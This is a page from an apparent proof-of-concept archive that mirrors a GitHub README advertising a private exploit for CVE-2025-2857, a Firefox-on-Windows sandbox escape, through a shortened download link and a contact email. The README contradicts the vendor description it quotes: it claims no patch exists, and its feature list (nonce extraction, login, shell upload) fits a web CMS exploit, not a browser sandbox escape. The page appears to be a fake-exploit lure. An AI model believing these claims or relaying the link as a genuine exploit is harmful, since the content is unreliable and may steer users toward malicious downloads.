Goal Reached Thanks to every supporter β€” we hit 100%!

Goal: 1000 CNY Β· Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2025-2857 PoC β€” Incorrect handle could lead to sandbox escapes

Source
https://github.com/RimaRuer/CVE-2025-2857-Exploit
Associated Vulnerability
Title:Incorrect handle could lead to sandbox escapes (CVE-2025-2857)
Description:Following the recent Chrome sandbox escape (CVE-2025-2783), various Firefox developers identified a similar pattern in our IPC code. A compromised child process could cause the parent process to return an unintentionally powerful handle, leading to a sandbox escape. The original vulnerability was being exploited in the wild. *This only affects Firefox on Windows. Other operating systems are unaffected.*. This vulnerability was fixed in Firefox 136.0.4, Firefox ESR 128.8.1, and Firefox ESR 115.21.1.
Readme
# CVE-2025-2857

## πŸ“–Overview
A sandbox escape vulnerability in Firefox on Windows, discovered by Firefox developers. The vulnerability allows attackers to confuse the parent process into leaking handles into unprivileged child processes, potentially breaking the sandbox security model.

## Exploit:
## [Download here](https://tinyurl.com/nanhrvvy)
## Details
+ **CVE ID**: CVE-2025-2857
+ **Published**: 03/27/2025
+ **Impact**: Critical
+ **Exploit Availability**: Not public, only private.
+ **Patch Available:  (No official patch yet)**
+ **CVSS**: 10
## Impact
Critical severity vulnerability that enables attackers to potentially: - Escape the browser's sandbox protection - Execute arbitrary code - Compromise system integrity - Gain unauthorized access to system resources This vulnerability specifically targets Firefox on Windows and was being actively exploited in the wild.


## Exploit Features
+ βœ… Automated Exploitation – Extracts nonce, logs in, and uploads the shell automatically.
+ βœ… Version Check – Confirms if the target is vulnerable before exploitation.
+ βœ… Error Handling – Ensures smooth execution even in case of failures.
+ βœ… Session Handling – Uses persistent session management for authentication.
+ βœ… Real-time Feedback – Provides output at each step.



## Contact
+ **For inquiries, please contact:doppler21@outlook.com**
+ **Exploit** :[Download here](https://tinyurl.com/nanhrvvy)
File Snapshot

 [4.0K]  /data/pocs/1820f6e89b7a327335a6d8903c90169ee129b3ca
└── [1.4K]  README.md

0 directories, 1 file
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers β€” if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online β€” thank you for the support. View subscription plans β†’